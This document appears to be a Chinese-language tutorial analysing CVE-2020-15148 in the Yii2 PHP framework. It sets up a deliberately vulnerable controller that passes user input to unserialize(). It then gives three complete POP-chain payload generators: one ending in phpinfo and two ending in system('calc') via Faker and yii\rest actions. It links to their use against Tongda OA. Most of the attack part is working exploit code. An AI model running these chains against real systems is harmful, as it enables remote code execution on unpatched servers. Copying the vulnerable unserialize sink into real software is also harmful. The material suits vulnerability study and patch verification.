PHP框架开发篇&Yii反序列化&POP利用链&某达OA&某商城&CVE分析
参考资料:CVE-2020-15148漏洞分析
https://www.extrader.top/posts/c79847ee
https://www.anquanke.com/post/id/254429
https://blog.csdn.net/unexpectedthing/article/details/123829375
1、环境部署:
phpstudy + PHP 7.4.3 + Apache + Yii 2.0.37。说明：下面三条利用链都以 yii\db\BatchQueryResult 能被反序列化为前提；请对照参考资料中 CVE-2020-15148 的修复，确认目标版本尚未打补丁，否则链头无法触发。
2、添加入口（仅限实验环境的故意漏洞入口：用户可控的 data 参数经 base64_decode 后直接进入 unserialize()，且未限制 allowed_classes）:
controllers/TestController.php
<?php
namespace app\controllers;
use yii\web\Controller;
class TestController extends Controller
{
    /**
     * Lab-only sink. The `data` action parameter is attacker-controlled; it is
     * base64-decoded and handed straight to unserialize() with no
     * `allowed_classes` restriction, so any autoloadable class can be
     * instantiated with attacker-chosen state and its magic methods
     * (__wakeup/__destruct/__call/...) run. This is the entry point the POP
     * chains below target — never ship it. A safe variant would use
     * json_decode(), or unserialize($raw, ['allowed_classes' => false]).
     *
     * @param string $data base64-encoded PHP serialized payload
     * @return mixed whatever unserialize() produces (false on a malformed payload)
     */
    public function actionTest($data)
    {
        // Non-strict base64_decode(): undecodable input is not rejected here.
        $serialized = base64_decode($data);
        return unserialize($serialized);
    }
}
3、反序列化链分析（三条链的链头相同：unserialize() 得到的 BatchQueryResult 对象析构时 __destruct()->reset()->close() 会调用 $_dataReader->close()，区别只在 _dataReader 指向的终端对象。两个通用前提：链中每个类都必须能在目标的 autoload 中加载；伪造类的属性可见性必须与真实类一致，因为 private/protected 会改变序列化后的属性名，例如 "\0yii\db\BatchQueryResult\0_dataReader"、"\0*\0formatters"）:
#POP链1（终端为 GuzzleHttp\Psr7\FnStream，需目标能自动加载该类；较新的 guzzle psr7 版本可能通过 __wakeup() 拒绝反序列化 FnStream，使用前请确认安装版本）:
yii\db\BatchQueryResult::__destruct()->reset()->close()
->$_dataReader
GuzzleHttp\Psr7::close()->call_user_func
->$_fn_close
<?php
//GuzzleHttp\Psr7::close()->call_user_func
//->$_fn_close
namespace GuzzleHttp\Psr7{
class FnStream
{
    /**
     * Stand-in for GuzzleHttp\Psr7\FnStream. The real class dispatches
     * close() through call_user_func($this->_fn_close), so an object whose
     * `_fn_close` holds a function name gets that function called when the
     * chain head invokes close() on it. The property must stay public (`var`
     * in the original): it has to serialise under its bare name, with no
     * visibility prefix, to land on the real object's `_fn_close`.
     */
    public $_fn_close = 'phpinfo';
}
}
//yii\db\BatchQueryResult::__destruct()->reset()->close()
//->$_dataReader
namespace yii\db{
use GuzzleHttp\Psr7\FnStream;
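class BatchQueryResult
{
    /**
     * Mirrors the private `_dataReader` slot of yii\db\BatchQueryResult.
     * Visibility must stay private: the serialised key is
     * "\0yii\db\BatchQueryResult\0_dataReader", which is what unserialize()
     * maps back onto the real object's private property.
     */
    private $_dataReader;

    /**
     * Chain head: on the target, __destruct() -> reset() -> close() ends in
     * $this->_dataReader->close(), so the object stored here has its close()
     * invoked when the unserialised result is destroyed.
     * NOTE(review): on a Yii release that carries the CVE-2020-15148 fix the
     * real class is expected to reject unserialisation — verify the target.
     *
     * @param object|null $dataReader terminal gadget; defaults to the FnStream stub (phpinfo)
     */
    public function __construct($dataReader = null)
    {
        $this->_dataReader = $dataReader ?? new FnStream();
    }
}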
}
namespace{
use yii\db\BatchQueryResult;

// Print the payload for the `data` parameter of TestController::actionTest().
// If it is sent in a query string, URL-encode it first: base64 output may
// contain '+', '/' and '=' which are otherwise mangled by the HTTP layer.
$payload = serialize(new BatchQueryResult());
echo base64_encode($payload);
}
#POP链2（终端经 Faker\Generator 中转；Faker 通常只作为开发依赖安装，生产环境不一定存在，利用前需确认）:
yii\db\BatchQueryResult::__destruct()->reset()->close()
->$_dataReader
Faker\Generator::__call()->format()->call_user_func_array()
->$formatters['close']
\yii\rest\IndexAction::run->call_user_func()
->$checkAccess $id
<?php
//\yii\rest\IndexAction::run->call_user_func()
//->$checkAccess $id
namespace yii\rest{
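class IndexAction
{
    /** Callable the real yii\rest\IndexAction::run() hands to call_user_func(). */
    public $checkAccess;

    /** Argument run() passes to $checkAccess. */
    public $id;

    /**
     * Terminal gadget: when run() fires, call_user_func($checkAccess, $id)
     * becomes $function($argument). Both properties are public on the real
     * class, so they serialise under their bare names.
     *
     * @param string $function PHP function name (default 'system')
     * @param string $argument its argument (default 'calc', a visible marker on the Windows lab host)
     */
    public function __construct($function = 'system', $argument = 'calc')
    {
        $this->checkAccess = $function;
        $this->id = $argument;
    }
}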
}
//Faker\Generator::__call()->format()->call_user_func_array()
//->$formatters['close']
namespace Faker{
use \yii\rest\IndexAction;
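class Generator
{
    /**
     * Mirrors Faker\Generator::$formatters. Protected visibility matters: it
     * serialises as "\0*\0formatters", the key the real object's property is
     * restored from. On the target, __call('close') -> format('close') ->
     * call_user_func_array($formatters['close'], ...) fires the next gadget.
     */
    protected $formatters = [];

    /**
     * @param callable|array|null $closeHandler what a close() call should be
     *        forwarded to; defaults to [new IndexAction(), 'run'] (system('calc'))
     */
    public function __construct($closeHandler = null)
    {
        $this->formatters['close'] = $closeHandler ?? [new IndexAction(), 'run'];
    }
}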
}
//yii\db\BatchQueryResult::__destruct()->reset()->close()
//->$_dataReader
namespace yii\db{
use Faker\Generator;
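class BatchQueryResult
{
    /**
     * Mirrors the private `_dataReader` slot of yii\db\BatchQueryResult.
     * Must stay private so it serialises as
     * "\0yii\db\BatchQueryResult\0_dataReader" and is restored onto the
     * real object's private property.
     */
    private $_dataReader;

    /**
     * Chain head: __destruct() -> reset() -> close() -> $this->_dataReader->close().
     * Here close() lands on the Faker Generator stub, whose __call() forwards
     * it to $formatters['close'].
     * NOTE(review): a Yii release carrying the CVE-2020-15148 fix is expected
     * to refuse to unserialise the real class — verify the target version.
     *
     * @param object|null $dataReader terminal gadget; defaults to the Generator stub
     */
    public function __construct($dataReader = null)
    {
        $this->_dataReader = $dataReader ?? new Generator();
    }
}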
}
namespace{
use yii\db\BatchQueryResult;

// Print the payload for the `data` parameter of TestController::actionTest().
// URL-encode it before placing it in a query string ('+', '/', '=' in
// base64 output are otherwise mangled).
$payload = serialize(new BatchQueryResult());
echo base64_encode($payload);
}
#POP链3（结构与链2相同，仅把终端由 IndexAction 换成 CreateAction；二者的 run() 都以 call_user_func($checkAccess, $id) 收尾，因此效果一致）:
yii\db\BatchQueryResult::__destruct()->reset()->close()
->$_dataReader
Faker\Generator::__call()->format()->call_user_func_array()
->$formatters['close']
\yii\rest\CreateAction::run->call_user_func()
->$checkAccess $id
<?php
//\yii\rest\CreateAction::run->call_user_func()
//->$checkAccess $id
namespace yii\rest{
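class CreateAction
{
    /** Callable the real yii\rest\CreateAction::run() hands to call_user_func(). */
    public $checkAccess;

    /** Argument run() passes to $checkAccess. */
    public $id;

    /**
     * Terminal gadget: run() ends in call_user_func($checkAccess, $id), i.e.
     * $function($argument) — system('calc') by default (command execution).
     * Both properties are public on the real class, so they serialise under
     * their bare names.
     *
     * @param string $function PHP function name (default 'system')
     * @param string $argument its argument (default 'calc')
     */
    public function __construct($function = 'system', $argument = 'calc')
    {
        $this->checkAccess = $function;
        $this->id = $argument;
    }
}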
}
//Faker\Generator::__call()->format()->call_user_func_array()
//->$formatters['close']
namespace Faker {
use yii\rest\CreateAction;
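class Generator
{
    /**
     * Mirrors Faker\Generator::$formatters. Initialised to an empty array for
     * consistency with the chain-2 stub (the serialised result is the same).
     * Protected visibility matters: the key serialises as "\0*\0formatters",
     * which is how it is restored onto the real object. On the target,
     * __call('close') -> format('close') -> call_user_func_array(
     * $formatters['close'], ...) fires the next gadget.
     */
    protected $formatters = [];

    /**
     * @param callable|array|null $closeHandler what a close() call should be
     *        forwarded to; defaults to [new CreateAction(), 'run'] (system('calc'))
     */
    public function __construct($closeHandler = null)
    {
        $this->formatters['close'] = $closeHandler ?? [new CreateAction(), 'run'];
    }
}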
}
//yii\db\BatchQueryResult::__destruct()->reset()->close()
//->$_dataReader
namespace yii\db{
use Faker\Generator;
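class BatchQueryResult
{
    /**
     * Mirrors the private `_dataReader` slot of yii\db\BatchQueryResult.
     * Must stay private so it serialises as
     * "\0yii\db\BatchQueryResult\0_dataReader" and is restored onto the
     * real object's private property.
     */
    private $_dataReader;

    /**
     * Chain head: __destruct() -> reset() -> close() -> $this->_dataReader->close().
     * close() lands on the Faker Generator stub, whose __call() forwards it
     * to $formatters['close'] (CreateAction::run).
     * NOTE(review): a Yii release carrying the CVE-2020-15148 fix is expected
     * to refuse to unserialise the real class — verify the target version.
     *
     * @param object|null $dataReader terminal gadget; defaults to the Generator stub
     */
    public function __construct($dataReader = null)
    {
        $this->_dataReader = $dataReader ?? new Generator();
    }
}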
}
namespace{
use yii\db\BatchQueryResult;

// Print the payload for the `data` parameter of TestController::actionTest().
// URL-encode it before placing it in a query string ('+', '/', '=' in
// base64 output are otherwise mangled).
$payload = serialize(new BatchQueryResult());
echo base64_encode($payload);
}
#实际结合:
1、通达OA-Yii反序列化结合
https://xz.aliyun.com/t/12855
https://forum.butian.net/index.php/share/2415
2、攻防演练审计和0day漏洞挖掘
https://mp.weixin.qq.com/s/L5uklnBuolfqEg-bR4V0rQ